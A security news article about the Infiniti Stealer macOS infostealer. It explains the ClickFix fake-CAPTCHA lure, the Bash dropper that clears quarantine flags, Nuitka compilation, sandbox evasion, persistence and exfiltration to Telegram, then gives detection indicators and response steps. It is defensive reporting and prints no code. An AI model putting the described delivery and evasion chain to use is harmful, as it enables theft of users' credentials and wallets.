Infiniti Stealer is not a macOS exploit — it weaponizes ClickFix social engineering and Nuitka-compiled Python to bypass defenses
Infiniti Stealer is a recently documented macOS infostealer that relies on a fake CAPTCHA (the ClickFix technique) and a Nuitka-compiled Python payload to evade detection — it succeeds because it manipulates users, not by exploiting a software vulnerability.
How the attack actually reaches a user
In observed samples the initial lure is a Cloudflare-style CAPTCHA hosted on update-check[.]com that instructs victims to paste a Terminal command; that social-engineering method is known as ClickFix and forces the user to run the installer manually rather than exploiting a bug. The pasted command downloads a staged payload: a Bash dropper that writes a second-stage binary into a temporary folder, clears macOS quarantine flags, and executes the payload.
Security analysts note the dropper shares code patterns with earlier macOS stealers such as MacSync, suggesting reuse of builder tools or kits. This pattern is important because it explains why detection can lag — defenders focus on exploits, while these campaigns hinge on convincing users to run code themselves.
What the installed payload does and how it hides
Instead of a plain Python script, the core stealer is Python 3.11 code compiled into a native Mach-O using Nuitka. The loader unpacks a large embedded archive (about 35 MB in the sample) at runtime and launches the final stealer module; that compiled form raises the bar for analysts and signature-based defenses compared with raw .py files or common packers like PyInstaller.
Once active, Infiniti targets a wide range of sensitive material — browser credentials, macOS Keychain items, cryptocurrency wallets, developer secrets, and screenshots — exfiltrating data via HTTP POST and alerting operators over Telegram. It employs sandbox and lab checks (blocking any.run, Joe Sandbox, VMware, VirtualBox), randomized delays to upset automated detectors, and persistence through LaunchAgents or cron jobs. The malware also abuses macOS accessibility features (the same ClickFix framework used at delivery) to simulate user interactions and maintain stealth.
Concrete detection signals and immediate steps for responders
Infiniti’s multi-stage chain yields distinct indicators at each hop: web referrals to update-check[.]com or similar fake CAPTCHA pages, Terminal paste-and-run activity, a Bash dropper writing files to /tmp, and a Mach-O that decompresses a large archive at launch. Those are actionable cues for both home users and enterprise teams.
| Stage | Observable indicator | Immediate action |
|---|---|---|
| Delivery (ClickFix) | Referrer to update-check[.]com; recent Terminal paste history | Block domain at web gateway; review Terminal history; advise users not to run pasted commands |
| Bash dropper | Files created in /tmp or ~/Library with removed quarantine flags | Quarantine-preserving scans; remove suspicious files; check LaunchAgents/cron |
| Nuitka Mach-O loader | Mach-O with large embedded archive (~35 MB); unusual process spawns | Isolate host; capture process image; run static/behavioral analysis in a controlled lab |
| Exfiltration & persistence | HTTP POSTs to unknown endpoints; Telegram notification traffic; LaunchAgents entries | Block endpoints; revoke exposed credentials/API keys; rotate secrets from a clean device |
Quick Q&A
Did Infiniti exploit macOS vulnerabilities? No — observed samples use social engineering (ClickFix) to get users to run a command rather than exploiting a software flaw.
What should an affected user do now? Stop sensitive activity on the device, move to a known-clean machine, change passwords and revoke keys, scan the Mac with a reputable tool (e.g., Malwarebytes), and inspect ~/Library/LaunchAgents and cron entries for suspicious items.
What to watch next and the decision checkpoint for defenders
The key question is whether ClickFix delivery paired with Nuitka compilation becomes a standard tactic across macOS campaigns. Microsoft has reported a rapid expansion of infostealers on macOS driven by cross-platform languages like Python; if other operators adopt Nuitka for obfuscation, defenders will face more compiled-Python samples that evade script-focused detection.
Watch for increasing telemetry: more domains mimicking update-check[.]com, reuse of MacSync-like dropper code, or vendor reports of additional Nuitka-compiled Mach-O samples. For procurement and operations teams, the practical decision lens is this — if you see repeated paste-to-Terminal infections or a rising number of large embedded-archive Mach-O binaries in your estate, prioritize web filtering and endpoint controls that intercept social-engineering delivery and inspect native binaries rather than relying solely on script-scanning rules.
